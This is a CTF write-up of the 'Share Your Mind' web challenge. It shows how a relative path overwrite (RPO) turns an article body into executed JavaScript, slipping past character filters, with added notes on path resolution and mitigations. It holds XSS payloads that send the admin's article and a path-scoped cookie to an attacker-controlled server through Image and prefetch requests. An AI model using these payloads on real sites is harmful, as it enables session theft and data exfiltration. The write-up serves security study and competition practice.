RPO & Share Your Mind


Source: http://pupiles.com/qiangwangbei.html

A long time ago I read an article about RPO, but by now I had forgotten what it was for; I had not looked at the article in ages... and then it was needed this soon... Lesson learned.

Approach

For this challenge I have to write up the pitfalls I fell into. First I went in and browsed the site's functionality: there is a page for reporting a bug, and a place for creating new articles.

The last feature is viewing articles (but you can only view your own). My first thought was XSS+CSRF: create a new article that references a JS file, send it to the bot, and have an Ajax request fetch the admin's article and send it back. But on following this idea we found that in the new-article page our <> characters were filtered, so we could not construct the JS directly. I wondered whether XSS was possible on the report page instead, but there is filtering there too: it will only issue requests to addresses on the site's own domain. "Incredibly", though, that filter can be bypassed!!!!!! Payload:

http://39.107.33.96:20000/index.php/report/<script src="xxxxxx.com"></script>

So the endless pit began. First, the results the bot returned contained no cookie; at first I did not think about HttpOnly being set. (Later I roughly understood the bot's procedure: it first checks the URL (unread), then calls add_cookie (read). Using a <script> tag directly here actually returns before add_cookie, so there is no cookie.) I then had it make an Ajax request to read the admin's article, with the following code:

var a = new XMLHttpRequest();
a.open('GET', 'index.php/view/article/1', false);   // synchronous request for article 1 (the admin's)
a.send(null);
b = a.responseText;
(new Image()).src = 'http://xxxxx/?flag=' + escape(b);   // send the response body to the author's server

But the bot's result showed that it was not logged in, which left me very confused. Then hint1 came out: phantomjs/2.1.1. That hint made me think the target was the bot itself, and I googled all over for a 2.1.1 vulnerability, until in the afternoon hint2 came out: the vulnerability is not in the report page... An afternoon's effort overturned. It was not until the night that I remembered: the index page references /static/js/bootstrap.min.js with a relative path.

I remembered the RPO article I read over winter vacation. I do not want to repeat the principle of RPO here, so here is a link:
https://open.appscan.io/article-462.html
The article view page here does not declare DOCTYPE HTML, so there is an RPO vulnerability. Create a new article with an empty title (the title is not empty when adding a
and put JS code such as alert(1) in the content.

Then visit

http://39.107.33.96:20000/index.php/view/article/635/..%2f..%2f..%2f..%2findex.php

replacing 635 with the id of your article. For the server, this request resolves to

http://39.107.33.96:20000/index.php

but for the browser, the page it is visiting is

http://39.107.33.96:20000/index.php/view/article/635/..%2f..%2f..%2f..%2findex.php

At this point the browser issues the request for the JS that the original index.php loads, ./static/js/bootstrap.min.js, which resolves to

http://39.107.33.96:20000/index.php/view/article/635/..%2f..%2f..%2f..%2findex.php/../static/js/bootstrap.min.js

that is, equivalent to

http://39.107.33.96:20000/index.php/view/article/635/static/js/bootstrap.min.js

Requesting this URL returns the same result as requesting

http://39.107.33.96:20000/index.php/view/article/635/

namely the content of your article (test it locally if this is not clear). The difference is that the browser hands your article to the JS engine, so your article is executed as a piece of JS. This lets us bypass the <> filter and get XSS.
So we create a new article containing

var a = new XMLHttpRequest();
a.open('GET', 'Yourvpsip', false);   // 'Yourvpsip' is the placeholder for the author's own VPS address
a.send(null);

Then use the browser to access

http://39.107.33.96:20000/index.php/view/article/22957/..%2f..%2f..%2f..%2findex.php
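To make the path-resolution argument above concrete, here is an added example (not code from the original writeup) that reproduces, with the browser's own WHATWG URL parser, how the browser resolves the page's relative script reference versus how a server that decodes %2f and collapses ".." sees the same request, and checks which references are immune. The router (anything under /index.php/view/article/<id>/ serves article <id>), the server's decoding behaviour and all function names are assumptions drawn from the behaviour the writeup describes.

```javascript
// Added example, not from the original writeup. Assumed: the app decodes %2f
// and collapses ".." before routing, and routes any path under
// /index.php/view/article/<id>/ to article <id>, as the writeup's behaviour implies.
const PAGE_URL =
  'http://39.107.33.96:20000/index.php/view/article/635/..%2f..%2f..%2f..%2findex.php';

// Browser side: the WHATWG URL parser keeps "%2f" as part of an opaque segment,
// not a separator, so the page's "directory" is /index.php/view/article/635/
// and a relative reference is resolved underneath it.
function browserResolves(pageUrl, ref) {
  return new URL(ref, pageUrl).pathname;
}

// Server side (assumed): decode the path, then collapse "." and ".." segments.
function serverNormalizes(rawPath) {
  const out = [];
  for (const seg of decodeURIComponent(rawPath).split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') { out.pop(); continue; }
    out.push(seg);
  }
  return '/' + out.join('/');
}

// Assumed router: anything under /index.php/view/article/<id>/ serves article <id>.
function articleIdFor(normalizedPath) {
  const m = /^\/index\.php\/view\/article\/(\d+)(\/|$)/.exec(normalizedPath);
  return m ? m[1] : null;
}

// Mitigation check: a reference is immune to RPO only when the browser's
// resolution does not depend on the page path, i.e. root-relative or absolute.
function isRpoSafe(ref) {
  return ref.startsWith('/') || /^https?:\/\//i.test(ref);
}

// Walk one script reference through both sides and report what the browser
// ends up executing: the real script, or whatever article the server routes to.
function traceScriptRef(pageUrl, ref) {
  const requested = browserResolves(pageUrl, ref);
  const seen = serverNormalizes(requested);
  return { requested, seen, servesArticle: articleIdFor(seen) };
}
```

In the writeup's setup the browser requests /index.php/view/article/635/static/js/bootstrap.min.js and, because the server routes that to article 635, executes the article body as a script; a root-relative script path, or an X-Content-Type-Options: nosniff header (which makes the browser refuse to execute a non-JavaScript MIME type as a script), closes the gap.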

Then I found that no request was actually made. Looking at the source, I discovered that " and ' are filtered. So I cleverly used backticks instead, and fell into an endless road of metaphysics: in my local browser the VPS received the request,

but when submitted to the bot it did not. I was stuck here for a very long time and even asked whether the bot was broken... until in the evening String.fromCharCode solved the metaphysics (this point really stuck me for a long time). (PhantomJS 2.1.1 predates ES6 and does not understand template-literal backticks, which is why the local browser worked and the bot did not.) The rest was relatively simple: after the request arrived, I found a hint about a cookie.

This reminded me of the subdirectory-cookie challenge from the national competition (https://www.lorexxar.cn/2017/07/11/guosai2017/), so I adapted that script to read the subdirectory cookie:

var iframe = document.createElement("iframe");
iframe.src = "/QWB_F14G/QWB";   // path under which the cookie is scoped
iframe.id = "frame";
document.body.appendChild(iframe);
iframe.onload = function () {
    // same-origin frame, so its document.cookie is readable from the parent
    var c = document.getElementById('frame').contentWindow.document.cookie;
    var n0t = document.createElement("link");
    n0t.setAttribute("rel", "prefetch");
    n0t.setAttribute("href", "//xxx/?" + c);
    document.head.appendChild(n0t);
}

Then encode everything inside the quotes with String.fromCharCode().
